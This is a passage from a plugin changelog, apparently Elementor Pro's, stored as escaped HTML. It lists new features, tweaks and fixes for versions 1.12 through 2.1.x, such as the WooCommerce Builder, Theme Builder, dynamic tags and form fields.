href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5117\\\">#5117<\\/a>)<\\/li>\\n<li>Tweak: Allow HTML in Excerpt widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5491\\\">#5491<\\/a>)<\\/li>\\n<li>Tweak: Added compatibility for the upcoming release of Elementor v2.2<\\/li>\\n<li>Tweak: Deprecated Follow option in the Facebook Button widget<\\/li>\\n<li>Fix: Posts widget grid in Safari & IE11 (Depended on Elementor v2.2)<\\/li>\\n<li>Fix: Posts widget CSS when using cards skin in masonry mode<\\/li>\\n<li>Fix: ACF Image & ACF URL option support (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5344\\\">#5344<\\/a>)<\\/li>\\n<li>Fix: WC product gallery links in RTL<\\/li>\\n<li>Fix: Dynamic tags in Call To Action widget<\\/li>\\n<\\/ul>\\n<h4>2.1.5 - 2018-08-21<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for the upcoming release of Elementor v2.2<\\/li>\\n<li>Fix: Posts Widget layout theme compatibility<\\/li>\\n<li>Fix: Added compatibility for WooCommerce native style<\\/li>\\n<\\/ul>\\n<h4>2.1.4 - 2018-08-19<\\/h4>\\n<ul>\\n<li>Fix: Layout issue compatibility with themes caused by v2.1 (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5442\\\">#5442<\\/a>)<\\/li>\\n<li>Fix: Dynamic setting in Pricing Table widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5460\\\">#5460<\\/a>)<\\/li>\\n<li>Fix: Hide Target URL control if is not necessary in Blockquote widget<\\/li>\\n<li>Fix: Selector specificity for WooCommerce Products widget<\\/li>\\n<li>Fix: WooCommerce conflicts in the editor in edge cases<\\/li>\\n<\\/ul>\\n<h4>2.1.3 - 2018-08-15<\\/h4>\\n<ul>\\n<li>Fix: Thumbnails in the Posts widget jumping (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5350\\\">#5350<\\/a>)<\\/li>\\n<li>Fix: Responsive grid in the Share Buttons widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5375\\\">#5375<\\/a>)<\\/li>\\n<li>Fix: Added missing <code>setup_postdata<\\/code> for Product Data Tabs widget<\\/li>\\n<li>Fix: Rollback to older version of Flip Box widget to resolve 3D depth issue (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5399\\\">#5399<\\/a>)<\\/li>\\n<li>Fix: Allowed types in the Upload File field are now case-insensitive (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5254\\\">#5254<\\/a>)<\\/li>\\n<li>Fix: Carousel behavior when using a single slide<\\/li>\\n<\\/ul>\\n<h4>2.1.2 - 2018-08-12<\\/h4>\\n<ul>\\n<li>Fix: Error when ACF Pro is not installed (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5367\\\">#5367<\\/a>)<\\/li>\\n<li>Fix: Edge cases in Inspector where document is a boolean<\\/li>\\n<li>Fix: Edge cases for incorrect file fields in PODS<\\/li>\\n<\\/ul>\\n<h4>2.1.1 - 2018-08-09<\\/h4>\\n<ul>\\n<li>Fix: Highlighted text in Animated Headline widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5345\\\">#5345<\\/a>)<\\/li>\\n<li>Fix: Flip Box effect issues<\\/li>\\n<li>Fix: ACF Options page fields support (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5329\\\">#5329<\\/a>)<\\/li>\\n<li>Fix: Import Pro templates in edge cases<\\/li>\\n<\\/ul>\\n<h4>2.1.0 - 2018-08-07<\\/h4>\\n<ul>\\n<li>New: Introducing WooCommerce Builder (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1690\\\">#1690<\\/a>)<\\/li>\\n<li>New: Introducing 12 new dynamic tags & widgets for WooCommerce: Gallery, Image, Price, Rating, Description, Breadcrumbs, Data Tabs, Stock, Related, Upsell, Title & Archive<\\/li>\\n<li>New: Introducing Cart Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4220\\\">#4220<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4600\\\">#4600<\\/a>)<\\/li>\\n<li>New: Added integration with Toolset (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2949\\\">#2949<\\/a>)<\\/li>\\n<li>New: Added integration with Pods (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4129\\\">#4129<\\/a>)<\\/li>\\n<li>New: Added stick to bottom in scrolling effects (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4799\\\">#4799<\\/a>)<\\/li>\\n<li>New: Added Scrolling Effect to Widgets under advanced tab<\\/li>\\n<li>New: Introducing Internal URL Dynamic Tag<\\/li>\\n<li>Tweak: Added a Last Updated Date in the Post Info widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4597\\\">#4597<\\/a>)<\\/li>\\n<li>Tweak: Added Redirect after Logout option for Login widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4447\\\">#4447<\\/a>)<\\/li>\\n<li>Tweak: Avoid repeating posts when using more than one in the Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1878\\\">#1878<\\/a>)<\\/li>\\n<li>Tweak: Add Custom Query hook for Query control (<a href=\\\"https:\\/\\/developers.elementor.com\\/custom-query-filter\\/\\\">More Info<\\/a>) (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1748\\\">#1748<\\/a>)<\\/li>\\n<li>Tweak: Added form-message style (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1180\\\">#1180<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic tag for button on the Price Table widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4242\\\">#4242<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic tag for Call to action widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4767\\\">#4767<\\/a>)<\\/li>\\n<li>Tweak: Added Dynamic Tags support for Google Map field (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4602\\\">#4602<\\/a>)<\\/li>\\n<li>Tweak: Added an support for <code>label|value<\\/code> in options field (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4594\\\">#4594<\\/a>)<\\/li>\\n<li>Tweak: Added <code>by-author<\\/code> condition for theme builder (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4681\\\">#4681<\\/a>)<\\/li>\\n<li>Tweak: Added Activate\\/Deactivate license key via WP-CLI command (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4149\\\">#4149<\\/a>)<\\/li>\\n<li>Tweak: Added <code>is_scroll<\\/code> trigger to scrolling effect (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4340\\\">#4340<\\/a>)<\\/li>\\n<li>Tweak: Added In Same Term support for Post Navigation widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4177\\\">#4177<\\/a>)<\\/li>\\n<li>Tweak: Added responsive control for Slides To Scroll control in all carousel widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3697\\\">#3697<\\/a>)<\\/li>\\n<li>Tweak: Added style options for Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1335\\\">#1335<\\/a>)<\\/li>\\n<li>Tweak: Added button CSS ID for Forms widget<\\/li>\\n<li>Tweak: Added pixel units to Post-Info divider height control<\\/li>\\n<li>Tweak: Rewrite sticky library to handle with stretch section, auto scroller & more bugs<\\/li>\\n<li>Tweak: Re-organize the panel categories per document type<\\/li>\\n<li>Tweak: Added ACF support for <code>options-page<\\/code> fields<\\/li>\\n<li>Tweak: Added dynamic tag for Animated headlines<\\/li>\\n<li>Tweak: Added dynamic tag for BlockQuote widget<\\/li>\\n<li>Fix: Elementor Full Width template in GeneratePress theme (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4817\\\">#4817<\\/a>)<\\/li>\\n<li>Fix: Checkbox fields can accidentally be set to required (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4324\\\">#4324<\\/a>)<\\/li>\\n<li>Fix: Initial slide in Carousel widget<\\/li>\\n<li>Fix: Stay on current slide while editing in Carousel widget<\\/li>\\n<li>Fix: Default slides per device in Carousel widget<\\/li>\\n<li>Deprecated: Woo Products, Woo Elements & Single elements widgets<\\/li>\\n<\\/ul>\\n<h4>2.0.18 - 2018-07-27<\\/h4>\\n<ul>\\n<li>Fix: Global widget error on saving page<\\/li>\\n<\\/ul>\\n<h4>2.0.17 - 2018-07-26<\\/h4>\\n<ul>\\n<li>Fix: Sub menu indicator direction in Nav Menu widget<\\/li>\\n<li>Fix: Change the title and icon for Global Widget when is moving<\\/li>\\n<li>Fix: CSS wrapper selector for Page Document<\\/li>\\n<\\/ul>\\n<h4>2.0.16 - 2018-07-16<\\/h4>\\n<ul>\\n<li>Tweak: CSS Filter Control module is now included in Elementor<\\/li>\\n<li>Fix: Border gap in Portfolio widget when item gap set as <code>0<\\/code> (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5077\\\">#5077<\\/a>)<\\/li>\\n<li>Fix: Restore current query after get Global Widget data<\\/li>\\n<li>Fix: Add action item in History on unlink Global widget<\\/li>\\n<\\/ul>\\n<h4>2.0.15 - 2018-07-10<\\/h4>\\n<ul>\\n<li>Fix: Dropdown menu items collapsing when activated (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4996\\\">#4996<\\/a>)<\\/li>\\n<li>Fix: GMT offset in Countdown widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4997\\\">#4997<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.0.14 - 2018-07-08<\\/h4>\\n<ul>\\n<li>Tweak: Added set method to form record for developers (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4983\\\">#4983<\\/a>)<\\/li>\\n<li>Fix: Autoplay option for Carousels<\\/li>\\n<li>Fix: Close mobile menu on item click in the Nav Menu widget<\\/li>\\n<\\/ul>\\n<h4>2.0.13 - 2018-07-03<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for Elementor v2.1<\\/li>\\n<\\/ul>\\n<h4>2.0.12 - 2018-07-02<\\/h4>\\n<ul>\\n<li>Fix: Global widget PHP notices<\\/li>\\n<li>Fix: Slides widget active slide lost focus when clicking Editor tabs<\\/li>\\n<li>Fix: Form select field send all selected values on multiple selection<\\/li>\\n<li>Fix: Validate time field only if it\'s not empty<\\/li>\\n<li>Fix: ConvertKit API not saving name field<\\/li>\\n<\\/ul>\\n<h4>2.0.11 - 2018-06-12<\\/h4>\\n<ul>\\n<li>Fix: Theme Builder <code>author<\\/code> archive condition (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4593\\\">#4593<\\/a>)<\\/li>\\n<li>Fix: Respect password protected posts in Post Content widget<\\/li>\\n<li>Fix: Custom Fonts redirect to post edit screen in edge cases.<\\/li>\\n<\\/ul>\\n<h4>2.0.10 - 2018-06-05<\\/h4>\\n<ul>\\n<li>Tweak: Added <code>elementor\\/theme\\/get_location_templates\\/template_id<\\/code> filter hook for multi-language plugins<\\/li>\\n<li>Fix: Dynamic Post Terms missing taxonomies if the taxonomy is registered to more then one post types (#4386)<\\/li>\\n<li>Fix: Fields shortcode missing after removing a field in Form widget<\\/li>\\n<li>Deprecated: <code>get_theme_templates_by_location<\\/code> is replaced by <code>get_location_templates<\\/code><\\/li>\\n<\\/ul>\\n<h4>2.0.9 - 2018-05-28<\\/h4>\\n<ul>\\n<li>Fix: Compatibility for PHP version 5.4<\\/li>\\n<\\/ul>\\n<h4>2.0.8 - 2018-05-28<\\/h4>\\n<ul>\\n<li>Tweak: Added Active state for Nav Menu dropdown<\\/li>\\n<li>Tweak: Added style for "Nothing Found" Message for Archive Posts widget<\\/li>\\n<li>Tweak: Removed caption control in Site Logo widget<\\/li>\\n<li>Tweak: Added option to position currency symbol before\\/after In Price Table widget<\\/li>\\n<li>Fix: Query control manual selection does not show more than 10 items (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4479\\\">#4479<\\/a>)<\\/li>\\n<li>Fix: Styling glitch with terms list in Post Info widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4342\\\">#4342<\\/a>)<\\/li>\\n<li>Fix: Sub terms missing in Query control in edge cases (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4527\\\">#4527<\\/a>)<\\/li>\\n<li>Fix: Avoid rendering a template if it\'s not published<\\/li>\\n<li>Fix: 404 Page style not working<\\/li>\\n<li>Fix: Price Table button with hover animation not working in editor<\\/li>\\n<li>Fix: Styling conflict in Call to Action widget<\\/li>\\n<li>Fix: Global Widget tab translation<\\/li>\\n<li>Fix: Adding parent wrapper class to Site Title widget<\\/li>\\n<\\/ul>\\n<h4>2.0.7 - 2018-05-16<\\/h4>\\n<ul>\\n<li>Fix: Content not found on section when single is set to "All Singular"<\\/li>\\n<li>Fix: Open 404 template library for 404 page<\\/li>\\n<li>Tweak: Added CSS prefix for dev files<\\/li>\\n<li>Tweak: Removed product post type from display conditions<\\/li>\\n<\\/ul>\\n<h4>2.0.6 - 2018-05-15<\\/h4>\\n<ul>\\n<li>Tweak: Set type on create new single template<\\/li>\\n<li>Tweak: Always show the conditions dialog in the Draft status<\\/li>\\n<li>Tweak: Added document type <code>widget<\\/code><\\/li>\\n<li>Tweak: Added Post Custom Field tag to URL category<\\/li>\\n<li>Fix: When ACF Field Groups are Empty (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4428\\\">#4428<\\/a>)<\\/li>\\n<li>Fix: Links inside carousel in edge cases<\\/li>\\n<li>Fix: Responsive issue in My Templates area<\\/li>\\n<li>Fix: Image alignment for post content with text alignment<\\/li>\\n<li>Fix: Post Content widget when preview post is missing<\\/li>\\n<li>Fix: Global Widget tab translation<\\/li>\\n<li>Fix: Style settings for Post \\/ Archive Title widgets<\\/li>\\n<\\/ul>\\n<h4>2.0.5 - 2018-05-08<\\/h4>\\n<ul>\\n<li>Fix: Creating a CPT with name like document-type breaks the editor (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4203\\\">#4203<\\/a>)<\\/li>\\n<li>Fix: Added support for new version of reCAPTCHA<\\/li>\\n<li>Fix: Added fallback for controls after <code>post_status<\\/code><\\/li>\\n<li>Fix: Required field in forms widget<\\/li>\\n<li>Fix: Media Carousel in the Coverflow skin<\\/li>\\n<li>Fix: 404 Page show wrong template in edge cases<\\/li>\\n<li>Fix: Save the default menu in the Nav Menu widget<\\/li>\\n<\\/ul>\\n<h4>2.0.4 - 2018-05-02<\\/h4>\\n<ul>\\n<li>Tweak: Added parent\'s class for extended widgets<\\/li>\\n<li>Tweak: Set entire-site as default to avoid conflict with save without conditions<\\/li>\\n<li>Tweak: Initialize global model when it\'s needed<\\/li>\\n<li>Tweak: Removed some duplicate strings<\\/li>\\n<li>Tweak: Query control now includes empty terms<\\/li>\\n<li>Tweak: Design polish for conditions dialog<\\/li>\\n<li>Tweak: Decreasing <code>minimumInputLength<\\/code> to 1 of select2<\\/li>\\n<li>Fix: Editor not loading for single templates in edge cases<\\/li>\\n<li>Fix: Select2 in Safari takes it\'s time to get the original select width (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4310\\\">#4310<\\/a>)<\\/li>\\n<li>Fix: Slides per view not working for some effects<\\/li>\\n<li>Fix: New slides not showing in the editor<\\/li>\\n<li>Fix: Editor for section without a defined location, defaults to content area<\\/li>\\n<\\/ul>\\n<h4>2.0.3 - 2018-04-24<\\/h4>\\n<ul>\\n<li>Tweak: Optimize CSS for Post Info widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4214\\\">#4214<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4216\\\">#4216<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4225\\\">#4225<\\/a>)<\\/li>\\n<li>Fix: Double render on frontend view in core locations<\\/li>\\n<li>Fix: Masonry not working in edge cases<\\/li>\\n<li>Fix: Added default setting for Author Info tag<\\/li>\\n<\\/ul>\\n<h4>2.0.2 - 2018-04-18<\\/h4>\\n<ul>\\n<li>Fix: Regenerate conditions to include all templates<\\/li>\\n<\\/ul>\\n<h4>2.0.1 - 2018-04-17<\\/h4>\\n<ul>\\n<li>Tweak: Added div wrapper for Nothing Found massage (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4136\\\">#4136<\\/a>)<\\/li>\\n<li>Tweak: Show empty categories in Query Control & Display Conditions (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4127\\\">#4127<\\/a>)<\\/li>\\n<li>Tweak: Added Divider control for Post Info widget<\\/li>\\n<li>Fix: Update admin links in Yoast Breadcrumbs widget<\\/li>\\n<li>Fix: Sticky element conflict with clearfix CSS<\\/li>\\n<li>Fix: Compatibility for PHP version 5.4.32 & 5.5.16 and below<\\/li>\\n<li>Fix: Avoid running <code>wp_head<\\/code> hooks twice<\\/li>\\n<\\/ul>\\n<h4>2.0.0 - 2018-04-16<\\/h4>\\n<ul>\\n<li>New: Introducing Theme Builder - <a href=\\\"https:\\/\\/elementor.com\\/introducing-theme-builder\\/\\\">Release Post<\\/a> (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/417\\\">#417<\\/a>)<\\/li>\\n<li>New: Introducing Locations API to inject custom location templates<\\/li>\\n<li>New: Introducing Display Conditions for all dynamic templates<\\/li>\\n<li>New: Introducing Dynamic Tag feature - a new way to add dynamic content to your design<\\/li>\\n<li>New: Introducing Role manager to allow "Content Only mode" (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/483\\\">#483<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/653\\\">#653<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/885\\\">#885<\\/a>)<\\/li>\\n<li>New: Introducing 9 new dynamic widgets: Archive Posts, Archive Title, Post Content, Post Info, Post Title, Post Excerpt, Featured Image, Site Logo & Site Name (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/543\\\">#543<\\/a>)<\\/li>\\n<li>New: Introducing Developers area with guides and API documentation - <a href=\\\"https:\\/\\/elementor.com\\/introducing-elementor-developer-api\\/\\\">Release Post<\\/a> (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/451\\\">#451<\\/a>)<\\/li>\\n<li>New: Introducing <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor-hello-theme\\\">Elementor Hello Theme<\\/a> - A demonstration theme for developers<\\/li>\\n<li>New: Added new type of templates: Header, Footer, Single and Archive (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2761\\\">#2761<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2623\\\">#2623<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2109\\\">#2109<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2061\\\">#2061<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2439\\\">#2439<\\/a>)<\\/li>\\n<li>New: Design 404 page with Single template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1558\\\">#1558<\\/a>)<\\/li>\\n<li>New: Design Search Results with Archive template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3196\\\">#3196<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2590\\\">#2590<\\/a>)<\\/li>\\n<li>New: Added Scrolling Effect for sections including <em>Sticky Element<\\/em> per device (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2412\\\">#2412<\\/a>)<\\/li>\\n<li>New: Integration with Custom Fields (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2054\\\">#2054<\\/a>)<\\/li>\\n<li>New: Partial support for Toolset integration (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2949\\\">#2949<\\/a>)<\\/li>\\n<li>New: Partial support for Pods integration (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2169\\\">#2169<\\/a>)<\\/li>\\n<li>New: Partial support for ACF integration (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2041\\\">#2041<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2059\\\">#2059<\\/a>)<\\/li>\\n<li>Tweak: Add custom fields support for ActiveCampaign (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3531\\\">#3531<\\/a>)<\\/li>\\n<li>Tweak: Allow brackets in Forms Tel field<\\/li>\\n<li>Tweak: Added currency format control for Price Table widget<\\/li>\\n<li>Tweak: Reduced API request for some servers<\\/li>\\n<li>Fix: Dropdown <code>border-radius<\\/code> in Nav Menu widget<\\/li>\\n<li>Fix: Price List widget layout breaks in edge cases<\\/li>\\n<li>Note: This version requires Elementor v2.0.6<\\/li>\\n<\\/ul>\\n<h4>1.15.6 - 2018-03-28<\\/h4>\\n<ul>\\n<li>Fix: Removed duplicate Custom CSS section (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3938\\\">#3938<\\/a>)<\\/li>\\n<li>Fix: <code>box-shadow<\\/code> issue with cards skin (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3940\\\">#3940<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.15.5 - 2018-03-27<\\/h4>\\n<ul>\\n<li>Fix: Added global widget compatibility for Elementor v2.0<\\/li>\\n<li>Fix: Reduced API request for some servers<\\/li>\\n<\\/ul>\\n<h4>1.15.4 - 2018-03-26<\\/h4>\\n<ul>\\n<li>Tweak: Allow brackets in phone field<\\/li>\\n<li>Tweak: Added compatibility with Yoast 7.0.+<\\/li>\\n<li>Tweak: Added compatibility for the future release of Elementor v2.0<\\/li>\\n<li>Fix: Support for multiple carousel setting in editor<\\/li>\\n<li>Fix: <code>on_export<\\/code> issue in forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3890\\\">#3890<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.15.3 - 2018-03-07<\\/h4>\\n<ul>\\n<li>Tweak: Added unique class to field group div (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3595\\\">#3595<\\/a>)<\\/li>\\n<li>Fix: Screen Options missing when Pro is active (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3622\\\">#3622<\\/a>)<\\/li>\\n<li>Fix: Allow label styling even when <code>show labels<\\/code> is set hide (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3544\\\">#3544<\\/a>)<\\/li>\\n<li>Fix: Typography control not working in edge cases<\\/li>\\n<li>Fix: Safari compatibility for Search widget<\\/li>\\n<\\/ul>\\n<h4>1.15.2 - 2018-02-27<\\/h4>\\n<ul>\\n<li>Fix: Only add support mine-type if needed (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3543\\\">#3543<\\/a>)<\\/li>\\n<li>Fix: Better support for Old Typekit kits<\\/li>\\n<\\/ul>\\n<h4>1.15.1 - 2018-02-21<\\/h4>\\n<ul>\\n<li>Tweak: Custom font title placeholder is not <code>enter font family<\\/code><\\/li>\\n<li>Tweak: Custom font title set as required<\\/li>\\n<li>Fix: Custom font, <code>font-face<\\/code> enqueued only once if used in global (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3513\\\">#3513<\\/a>)<\\/li>\\n<li>Fix: Added workaround for upload validation which relies on a PHP extension (fileinfo) with inconsistent reporting behavior.<\\/li>\\n<\\/ul>\\n<h4>1.15.0 - 2018-02-19<\\/h4>\\n<ul>\\n<li>New: Added custom fonts manager for self hosted fonts (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/852\\\">#852<\\/a>)<\\/li>\\n<li>New: Integration with Adobe TypeKit fonts (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/631\\\">#631<\\/a>)<\\/li>\\n<li>Tweak: Clear menu from Nav Menu widget on template export<\\/li>\\n<li>Tweak: Allow zero for GetResponse integration as <code>day of cycle<\\/code><\\/li>\\n<\\/ul>\\n<h4>1.14.2 - 2018-02-13<\\/h4>\\n<ul>\\n<li>Fix: Global widget content that got affected by previous update<\\/li>\\n<\\/ul>\\n<h4>1.14.1 - 2018-02-13<\\/h4>\\n<ul>\\n<li>Tweak: Added <code>none<\\/code> option to content animation in CTA widget<\\/li>\\n<li>Tweak: Added <code>form_id<\\/code> to ActiveCampaign integration (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3422\\\">#3422<\\/a>)<\\/li>\\n<li>Fix: Page crashed when Global widget not found.<\\/li>\\n<\\/ul>\\n<h4>1.14.0 - 2018-02-12<\\/h4>\\n<ul>\\n<li>New: Added Call to Action widget<\\/li>\\n<li>Tweak: MailPoet pull field mapping from MailPoet instead of hardcoded<\\/li>\\n<li>Tweak: Added compatibility for the future release of Elementor v2.0<\\/li>\\n<li>Fix: Allow zero (0) to be accepted as a field value<\\/li>\\n<li>Fix: Login form when custom login URL is set<\\/li>\\n<li>Fix: Added Day of cycle control to GetResponse integration<\\/li>\\n<\\/ul>\\n<h4>1.13.2 - 2018-01-23<\\/h4>\\n<ul>\\n<li>Tweak: Added placeholder to Password field<\\/li>\\n<li>Tweak: Removed <code>subscriber_already_exists_message<\\/code> control to prevent potential data leakage<\\/li>\\n<li>Fix: MailPoet Subscriber Already Exists error validation against translated string directly from MailPoet<\\/li>\\n<li>Fix: Changed <code>imagesLoaded()<\\/code> to Vanilla JS to avoid compatibility issues with some themes<\\/li>\\n<li>Fix: Only validate Tel field if not empty<\\/li>\\n<li>Fix: Stop slider while editing<\\/li>\\n<\\/ul>\\n<h4>1.13.1 - 2018-01-16<\\/h4>\\n<ul>\\n<li>Fix: Added compatibility with old PHP versions<\\/li>\\n<\\/ul>\\n<h4>1.13.0 - 2018-01-16<\\/h4>\\n<ul>\\n<li>New: Added File Upload field for Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1482\\\">#1482<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2974\\\">#2974<\\/a>)<\\/li>\\n<li>New: Added Acceptance field for Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1693\\\">#1693<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2974\\\">#2974<\\/a>)<\\/li>\\n<li>New: Added Date field for Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1868\\\">#1868<\\/a>)<\\/li>\\n<li>New: Added Time field for Forms widget<\\/li>\\n<li>New: Added Password field for Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2164\\\">#2164<\\/a>)<\\/li>\\n<li>New: Added HTML field for Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1500\\\">#1500<\\/a>)<\\/li>\\n<li>Tweak: Added characters validation for Tel field<\\/li>\\n<li>Tweak: Added min & max validation for Number field<\\/li>\\n<li>Tweak: Added multiple selection for Select field<\\/li>\\n<li>Tweak: Added donReach integration for Share Buttons widget<\\/li>\\n<\\/ul>\\n<h4>1.12.3 - 2018-01-09<\\/h4>\\n<ul>\\n<li>Fix: Render element plain content instead of parsed content when not needed in global widget<\\/li>\\n<li>Fix: Apply <code>url-encoding<\\/code> to "Tweet" button text in Blockquote widget to prevent unexpected corruption of the tweet text<\\/li>\\n<li>Fix: Removed My Account link from dashboard widget<\\/li>\\n<\\/ul>\\n<h4>1.12.2 - 2018-01-03<\\/h4>\\n<ul>\\n<li>Tweak: Added animation none for Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2964\\\">#2964<\\/a>)<\\/li>\\n<li>Fix: Active license button style<\\/li>\\n<\\/ul>\\n<h4>1.12.1 - 2018-01-02<\\/h4>\\n<ul>\\n<li>Tweak: Removed theme-element widgets from plain content<\\/li>\\n<li>Tweak: Set all theme-element widgets to extend same widget Base<\\/li>\\n<li>Tweak: Removed credit URL in forms meta data<\\/li>\\n<li>Tweak: Added compatibility for the future release of Elementor v1.9<\\/li>\\n<li>Fix: Validate Get response Error as real error<\\/li>\\n<li>Fix: Removed responsive height control from Facebook Page widget<\\/li>\\n<\\/ul>\\n<h4>1.12.0 - 2017-12-20<\\/h4>\\n<ul>\\n<li>New: Added Drip integration to 